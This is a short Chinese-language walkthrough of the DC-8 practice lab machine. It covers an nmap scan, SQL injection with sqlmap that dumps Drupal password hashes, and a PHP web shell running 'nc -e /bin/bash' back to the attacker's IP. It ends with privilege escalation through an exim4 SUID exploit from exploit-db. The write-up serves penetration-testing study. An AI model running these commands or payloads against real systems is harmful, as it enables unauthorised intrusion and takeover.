DC-8
DC-8
信息收集
nmap -T4 -A -p 1-65535 192.168.211.140
又是Drupal
发现有nid这个参数看看能不能sql注入
web打点
sql注入
sqlmap -u "http://192.168.211.140/?nid=2" --dbs
sqlmap -u "http://192.168.211.140/?nid=2" -D d7db --tables
sqlmap -u "http://192.168.211.140/?nid=2" -D d7db -T users --columns
sqlmap -u "http://192.168.211.140/?nid=2" -D d7db -T users -C name --dump
admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
写shell,读文件权限都不够,直接拿去解密了
成功登陆
反弹shell
在此路径下找到可以写shell的地方,写入
<?php system("nc -e /bin/bash 192.168.211.131 6666");?>
填写表单,发送
python -c 'import pty;pty.spawn("/bin/bash")'
成功反弹shell
提权
SUID提权
find / -perm -u=s -type f 2>/dev/null
发现exim4,searchspolit
下载/usr/share/exploitdb/exploits/linux/local/46996.sh
启动http server
wget下载
这里很奇怪的一点,使用python启动交互式shell反而执行失败,直接执行成功
chmod 777 exp.sh
./exp.sh -m setuid
./exp.sh -m netcat
获取flag